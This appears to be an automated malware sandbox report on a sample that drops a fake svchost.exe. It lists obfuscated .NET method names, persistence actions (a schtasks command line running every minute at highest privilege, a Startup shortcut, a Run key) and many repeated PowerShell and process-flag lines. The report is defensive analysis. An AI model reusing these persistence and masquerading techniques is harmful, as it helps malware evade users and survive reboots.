                      Source: svchost.exe.0.dr, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.csHigh entropy of concatenated method names: 'xBASX7lsOJPU9Cck3kZ3o0qmLTAKuKrP', 'sGti6y5kLLjB4EZ2GKrqrV0zU', 'GsE9pLcip9MzANzPi5jppj9En', 'N6Q3SCv1YsLsr7H5DlyFIeDon', 'V6mV7RWu45SpqDfgnupk8TqiR'
                      Source: svchost.exe.0.dr, KTFdTAhBe0nkVRO.csHigh entropy of concatenated method names: 'Ac4uCzowotVAxeR', 'CBIihYpQadKB8KR', 'LzcKodkO0YBRvWP', 'OWqjciiKxuUIGMm', '_9xG6KQALPjaqxhT', 'veIBr5aKy0PJKi5', 'l6kAhdELfITzeJt', '_4ePiXFPx09SA1Vv', 'LVyky0svxDcPkam', 'XkNC0OhUGP0IEKK'
                      Source: svchost.exe.0.dr, xeujlJtakKMAZOjK0ur1WybEECxkXkut0zpG8ZNNqdLn0AX.csHigh entropy of concatenated method names: '_5aithjmI9LoLLPCiBILSlDH2d0kCQKXrMaEE5WJnq8Tv7Qp', 'MM7LW2HKoAitYgsdpjEATIqjAb0mwW0BBlvYMkhE7P10poq', 'QAbhGR8dNrSBTMQK0Yqav3jjG5ysRg32lWFoSxLIPma5gYP', '_0wUqk1OaVerqBQX3Y4EoWNEL1Gl2waveV0V6Gg77S9aATZP', 'Qdwp8hUnVeraABh1MLfyU5mz3arAdmAdd1aCcEk2Tl8TJDv', 'FZ2QI9XpgmmMWz11hK1DdH2zT62STcMbsDyZy4pm6rmtl3V', 'ACWqANoKGPn3bKLHCSH40rEahGuzJT1dxGB90nSsmjjylxv', 'pX8tVB0L5xZb2vb2dxPDe1rzEaM7wuaJwTZOCpk0aNdrtBw', 'fjhBRY1HMysdHfZcKmMXulYG8GDoyl12', 'McPQuVJNZQbtu65AyEQVTybL4WCB5cLo'
                      Source: svchost.exe.0.dr, 7G7PfuLETnOvbfIE7xucZO8XNTqvLqOJlbqtNQJY3lKmGbm.csHigh entropy of concatenated method names: 'DFCpCujzH36d3cngc34zOQoWzQTdK0myzc7qWpsXWNu21Jb', '_587FBEMOsxviTwCKL7yBbWITHUJ3bujt3wiySDVhRy1yxGt', 'uJohSukkbCa7xsGg2Qp44GPZQCpKe32xc2O2QcGU1Q6CEvS', 'Uq58pQq8xlhaYn5Y9Bk3mrYZu', 'Ct5qYzPDfKw8LQTboboAX4hNv', 'qwBAPgrRPhdIqDHwAhXvN1hRq', 'nxduhCDsny5h3nBj2HrQsA3c1', 'jEaCh8yFqsVsZ93zdOX0nzFV8', 'ONz3wVxNhiXm2TtIiy580HIt8', 'VZ6rHUWHhThtCv7iyZtPjrFZg'
                      Source: svchost.exe.0.dr, a0V5Zu6qlCMa06Q58DDhmURzmiMHtcd8kRscBWhcnJuQRjG.csHigh entropy of concatenated method names: 'jsYQiieE5aJ2jVwkXoxTSDWNphs6FAdVea24JiK6uxKGCZb', 'jvKVB8DMwRz9tgL1u0gNFSayI', 'FiiYcV3QUeyJyPiuXtFFLojQQ', '_4QTl9xaX3tWNxWuQRadqrMU6o', '_75GUCFNKwqLz6HmYfEL0DmkY1'
                      Source: svchost.exe.0.dr, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.csHigh entropy of concatenated method names: 'FMEE0DIkQDvLYM2Z4yz5Tjo5b5eLEuEI', 'jObZkjuGMhwEiPBfwOmsbOrrZXZmrCeZ', 'bk6xBVPwDLAsH9U1hF1haOabJtpvpGFf', 'IshekKslk6IjxnwmSRXRoHe4GAZv2VRl', 'GIs7dhgV0OPXyxFk6TOoHoDWhv8zemsT', 'ze8Iw4Nb7Z7m1Yb66vRbWQWrAsUFPxzJ', 'UvurS3nxIHoiBM88BrHYzPx81ufHUZkd', 'swIqkQW0BTghnqNG2wFoKjkNf068bLuM', '_2414yadJg26i5vSrWjNNjeYpa4szCoAz', 'lW6mYbJTX1vQ7vHCEMrrPebmTotc5GJY'
                      Source: svchost.exe.0.dr, EzYl9iqHKPGiGyI.csHigh entropy of concatenated method names: 'aP04aVJcS3soVLg', 'jobvqCGSO8bCpy3', 'OByK2z0r02mouhE', '_4I2j7ymc4y48Bup', 'MpaJfH3REaG3a2T', 'PeHeSMfcm6QgPRH', '_06w8NyFQYcs5BnZ', 'LJVYU95Gv9cQfMq', 'jDk0XayV147rHNd', 'csYJbTrZgHGnH53'
                      Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.csHigh entropy of concatenated method names: 'MNtS90o1HKWpwjmtlvO903GbNTByocWwLd7yyIZn6Q4ZtXK', 'tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De', 'k2x8Jncr7poTh7SyXKLhwBvqXviBc7HReEzrmXDNeueIj4R', 'wgDXMbPi6ZUBuZgeleKoQmPFcJwxyeFiCLlifHYgdhR0kc7', 'p38ACEv6I0M4R7dcFane6uBzs7RWaUJ9l5lCftfrOLZHjWg', 'lHKkwUzolK1oj4q73uwvSeNCO9BIzUcyRC2wJ4WagDWhbfa', '_5AFeAlHwXQJYUYqjS4jFcrE5EzKlM0aFnRQpSNnCeTUN6eE', '_82o2RiaQ2aGLU4TurZxmJUMkxwaoX6pdrgWihYO1RGfhj50', 'jDnkgKOMiZiOTgqeOCX5BUDS3xxH5oN9D1nr4XpUx1AU8Rf', 'qJsGITEdu1leqjdiZJFhkC1OAKNXz9CA0lm9WH1MwNzOsHq'
                      Source: svchost.exe.0.dr, lwW1zcF0pcqJbKLsstMtGHZdM9caYfdk.csHigh entropy of concatenated method names: 'l7fCYY3hc0ERgtj8l2K7qTWgPUDKEQSU', 'bS9VEFiDBIgkPYTtej3kDHMXOhc0vH1s', '_3rpjR4YrSy5LkzuZ6z3xtf0c6UG2bZn9', 'zCgKRcmv0rfANyVcOzIiznvJFtvCa578', 'YSoW1FxgADijTplK7zUzpfaDA', '_2Ps92OUWolTdyV0IUdBqYGalt', 'plj2ugHMesPs6bv2tYUVwp2QD', '_2sjEZEKIzfsvSQGXaY0jAyQhN', 'ewIb0YUwF52UsD1qEVkA5tgsF', 'oGza4w5ImtYazv7CV4rdJUC9v'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\ProgramData\svchost.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: Yara matchFile source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
